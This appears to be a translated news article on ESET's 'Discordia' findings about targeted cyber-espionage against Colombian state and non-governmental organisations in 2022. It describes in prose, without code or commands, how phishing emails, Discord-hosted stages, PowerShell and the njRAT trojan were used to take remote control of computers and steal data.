According to the results of the Discordia operation, carried out by the computer research laboratory of the company specializing in the development of cybersecurity software, ESET, Between the second week of February and March 30, 2022, Colombia was the recipient of 96% of attacks perpetrated under a modality that uses the Discord messaging platform to host malware, also known as viruses.
This type of cyber threat is aimed at non-governmental organizations and entities of the Colombian state. The attacks are not directed in a massive way either, but focused, so these cybercriminals had previously determined who their victims would be.
The main objective of these cyber attacks is to steal information, manipulate files and connect infected computers to malicious servers to continue extracting information for a longer period of time.
According to Miguel Ángel Mendoza, computer security specialist at the ESET laboratory, although these recent hacks could be related to the political situation in the country, attacks directed at Colombian organizations have been recorded before.
Regarding the above, ESET has already carried out two cybersecurity operations in 2019 and 2021 whose names are Machete and Bandidos, respectively, and the results of both investigations already indicated Colombia as a major recipient of these cyber espionage campaigns against institutions. state and non-governmental.
These threats managed to infect the computers of these entities through cemails that were sent to workers reporting a alleged fiscal requirement of the Accusatory Oral Criminal System, in a compressed file to download.
Once the person’s attention was captured, in order to download the document, a password was requested, which, however, the same email indicated what it was. Next, a virus known as “nj Rat” or remote access Trojan allowed the attacker to control the computer, having the ability to send files, take screenshots, activate and deactivate cameras.
In addition to the functions already mentioned over which the attacker had remote control, he was also able to identify which keys were pressed while the equipment was in use in order to steal passwords, this practice is known as “Keylogger”.
How Discord is related to these cyber attacks in Colombia
The attackers used the public and legitimate messaging service Discord as a platform to host the first malware or virus, From there, a second malware written in Power Shell was downloaded, which is a software used to automate administrative tasks in Windows operating systems.
This second malware worked to connect to Discord again and download a third Malware called Trojan that infects the machine and gives the attacker remote access to connect to the computers in question.
The Discordia operation also collected information about the way in which these groups dedicated to cyber espionage of state and non-governmental institutions operate. As a first step, they thoroughly investigate their possible victims, plan how to proceed, execute and Finally, they extract the data of interest, which also includes sensitive information about citizens.
:
